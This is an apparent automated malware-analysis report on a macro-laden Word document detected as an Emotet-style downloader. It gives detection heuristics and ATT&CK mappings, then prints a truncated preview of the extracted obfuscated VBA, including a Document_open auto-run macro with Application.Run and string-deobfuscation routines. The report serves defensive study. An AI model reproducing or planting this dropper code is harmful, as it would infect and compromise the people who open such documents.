MALICIOUS
182
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1059 Command and Scripting Interpreter
The sample contains VBA macros, including a Document_Open macro, and a critical heuristic firing for Shell() calls within VBA. This indicates the macro is designed to execute arbitrary commands. The ClamAV detection name 'Doc.Malware.Emodldr-10025032-0' further supports its malicious nature. The VBA script's obfuscated nature and the presence of Shell() calls suggest it likely downloads and executes a second-stage payload, a common technique for malware droppers.
Heuristics 5
-
ClamAV: Doc.Malware.Emodldr-10025032-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Emodldr-10025032-0
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 42394 bytes |
SHA-256: 3eb570307b7d309746221bc9e37b183fae837bbbee4034de9081ea3a405ca3f9 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "IHnhGEm"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub OOpQzT(iCtLP)
WHBuNI = 11849 - CDbl(1464 / Int(21664) - 35130 / Round(2315 / CSng(1760 - CByte(10643)))) * bWzOr * Fix(58511) - 98414 / CByte(pTqpN) / ZjcpXL - CBool(955) / EAfHN / Atn(87623)
End Sub
Sub woPsw(HEfTlm)
ShDXv = 27060 - CDbl(51842 / Int(52491) - 79789 / Round(22603 / CSng(56266 - CByte(89022)))) * SSzik * Fix(33359) - 10797 / CByte(sfbzOE) / fzWmZ - CBool(62568) / WwIMzS / Atn(53418)
cmziU = 79727 - CDbl(14656 / Int(94664) - 67324 / Round(38664 / CSng(62338 - CByte(38822)))) * CcajJJ * Fix(92386) - 85424 / CByte(rVocvA) / YSnXlD - CBool(78118) / kkcXzn / Atn(34818)
MQUThf = 80430 - CDbl(18431 / Int(61032) - 28461 / Round(74485 / CSng(91050 - CByte(55374)))) * stGWKB * Fix(87329) - 92669 / CByte(zoavYj) / sCYcb - CBool(22544) / hsscds / Atn(42994)
End Sub
Sub tWuri(dcQzQ)
UfHjQd = 14102 - CDbl(42738 / Int(69648) - 43078 / Round(995 / CSng(27619 - CByte(62881)))) * ZiSZP * Fix(7556) - 35653 / CByte(uDBjzH) / aIcLk - CBool(12934) / lILAk / Atn(262)
WWjLQr = 97965 - CDbl(18051 / Int(82836) - 68077 / Round(23532 / CSng(17323 - CByte(72419)))) * DijfzG * Fix(18937) - 26515 / CByte(CwLXs) / NPSSD - CBool(46347) / VVhQQQ / Atn(33734)
End Sub
Private Sub Document_open()
On Error Resume Next
zbVRha = 53106 - CDbl(40751 / Int(71604) - 87313 / Round(42794 / CSng(17487 - CByte(97744)))) * OETFwd * Fix(38092) - 87000 / CByte(iMWMOz) / qswiDV - CBool(81630) / Lkmuh / Atn(48083)
Application.Run PisHcw + "CjnWYLzmF" + SoZGk, FKNNXB + ZVzJBLuQ + dMUZt
OuOrZ = 22080 - CDbl(33849 / Int(3570) - 94496 / Round(78486 / CSng(39359 - CByte(13536)))) * mfaIE * Fix(94965) - 70724 / CByte(ABXYX) / VDCNSN - CBool(26544) / QDwAuS / Atn(70354)
End Sub
Sub VsGBP(CEQcI)
NsrSC = 60938 - CDbl(91960 / Int(97059) - 90336 / Round(52573 / CSng(3751 - CByte(87003)))) * DPXLE * Fix(5339) - 34243 / CByte(rjiSV) / wAzzq - CBool(10088) / UXLiz / Atn(28702)
mNuqN = 88487 - CDbl(22444 / Int(16041) - 59800 / Round(87541 / CSng(23270 - CByte(49267)))) * rWMNAj * Fix(29509) - 95472 / CByte(ziLnEj) / LhGnuh - CBool(57527) / nFbEpV / Atn(7479)
QOMwLw = 57103 - CDbl(32746 / Int(99192) - 49054 / Round(77832 / CSng(30765 - CByte(30671)))) * ZpcQTM * Fix(11402) - 72630 / CByte(JsaavF) / Hbtsv - CBool(49046) / kjNDpo / Atn(40668)
End Sub
Sub NWIflc(CrfiS)
FkYiL = 78681 - CDbl(34035 / Int(24174) - 42915 / Round(44146 / CSng(68785 - CByte(99380)))) * rkGJQz * Fix(51829) - 32578 / CByte(ERPTii) / CNQHp - CBool(59922) / oVdzDj / Atn(83853)
End Sub
Sub Yjokow(Ohrlaj)
SrGim = 38584 - CDbl(17618 / Int(36928) - 85724 / Round(14136 / CSng(24408 - CByte(78126)))) * nnwXk * Fix(75158) - 9799 / CByte(jfwtdT) / jPEEPi - CBool(4840) / tUtXqF / Atn(76133)
XAiubj = 38370 - CDbl(1532 / Int(76670) - 52622 / Round(24940 / CSng(67644 - CByte(23559)))) * pJAJj * Fix(55628) - 5591 / CByte(ZilAF) / rPPov - CBool(96371) / twZXAv / Atn(7027)
End Sub
Attribute VB_Name = "nVTZlfjXj"
Sub KiPaw(aiQJY)
YnOjv = 21122 - CDbl(51226 / Int(72668) - 68585 / Round(63897 / CSng(98564 - CByte(84885)))) * NSaTXH * Fix(84908) - 66943 / CByte(lTLTC) / zWius - CBool(53034) / jLEkYw / Atn(89357)
End Sub
Function ZVzJBLuQ()
On Error Resume Next
jVkpip = 89093 - CDbl(35929 / Int(69428) - 33235 / Round(92559 / CSng(2309 - CByte(40802)))) * QRDsqw * Fix(54914) - 6493 / CByte(dCjnKQ) / VFOzP - CBool(74159) / bJvFTU / Atn(13197)
ncsLoWGYLd = trPpFO("qHX'+'8S'+'+XmJX+mJX8SmJX+mJXw-omJX+mJXbjecXmJX+mJX8S+X8StX8S)mJX+mJX rmh4B.3", brlqU - brlqU + 4 + brlqU - brlqU, brlqU - brlqU + 69 + brlqU - brlqU)
vLzrwp = 91130 - CDbl(50472 / Int(16162) - 25025 / Round(56394 / CSng(64124 - CByte(14537)))) * CBjBPv * Fix(82149) - 74456 / CByte(NdXci) / tIihzG - CBool(40219) / TSfafG / Atn(70076)
RHMpHj = 36485 - CDbl(16199 / Int(61752) - 99649 / Round(32332 / CSng(33177 - CByte(16171)))) * jdVjw * Fix(31883) -
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.